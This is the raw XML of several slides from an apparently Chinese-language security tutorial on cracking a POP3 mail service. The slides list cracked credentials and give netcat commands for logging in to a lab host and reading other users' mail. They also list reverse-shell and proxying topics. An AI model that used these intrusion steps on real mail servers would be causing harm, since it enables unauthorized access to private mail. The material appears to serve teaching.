                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>service	指定服务名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78503228-4B8F-4B3A-989D-7EE866D9D967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235784" y="4138940"/>
            <a:ext cx="2717800" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200" algn="l" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户：boris </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" algn="l" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码：secret1!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" algn="l" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户：natalya </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" algn="l" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码：bird</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5C0ED7F-7A47-4391-8804-6E1227A674A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId12"/>
          <a:srcRect l="-3" t="82430" r="60802" b="-466"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="382400" y="5120968"/>
            <a:ext cx="5226165" cy="1020445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113333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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46DFB77-486D-4E90-AF3A-05A64394F0CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424290" y="978733"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2D5AC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id-ID" sz="2800" b="1" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D63FB7E-EDE5-42F7-8CDE-EA7132905CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279789" y="1010158"/>
            <a:ext cx="5218166" cy="673454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>邮箱登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9238A16A-D56A-4215-B089-4B9E3B2CEEE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390842" y="1737034"/>
            <a:ext cx="5240655" cy="1499870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600"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nc 192.168.4.202 55007     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>---登录邮箱</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600"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user boris                 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>---登录用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600"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pass secret1!              </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>---登录密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600"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list                      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ---查看邮件数量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600"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sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>retr 1~3                   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>---查看邮件内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="直接连接符 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE17AE2-E613-4C64-B783-B2A8242F0E36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5679440" y="1018540"/>
            <a:ext cx="0" cy="5466715"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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02403CC1-9DCA-4AD7-A9E4-7CED72F7130D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096635" y="1419860"/>
            <a:ext cx="5756910" cy="5066030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80556BEF-6717-4145-846C-41BCC9E87646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096635" y="1308100"/>
            <a:ext cx="5756910" cy="998855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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netcat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="24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黑客的瑞士军刀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="右箭头 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0C0C55-6AF9-4D14-A58D-8504B8092A1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308090" y="2608580"/>
            <a:ext cx="189865" cy="249555"/>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2500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="右箭头 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{135854E0-BFFA-4E00-96EA-3EAFB6AF7140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6310630" y="3996690"/>
            <a:ext cx="208280" cy="256540"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 100000"/>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2500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="矩形 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FE60B9F-0E30-4843-9706-90C5DE263594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593840" y="2519045"/>
            <a:ext cx="4841875" cy="1477645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>客户端连接服务器shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务器连接客户端shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python、bash反向shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内网代理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="图片 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C7355B-3EE6-4F95-A981-60A9187FACF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect b="40643"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="513715" y="3285350"/>
            <a:ext cx="4616450" cy="3241040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="图片 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506089FF-9B3D-4C15-BF7C-19E5A6E28EE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:srcRect b="49631"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593840" y="4110355"/>
            <a:ext cx="5084445" cy="2035810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366050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破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A08E737-CA6E-4B64-BDEB-DD6C8EBED515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="424290" y="978733"/>
            <a:ext cx="709855" cy="709855"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2D5AC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id-ID" sz="2800" b="1" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E26116-85C6-44A5-91E0-2290614F9DD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323355" y="978733"/>
            <a:ext cx="5218166" cy="673454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>读取邮件内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
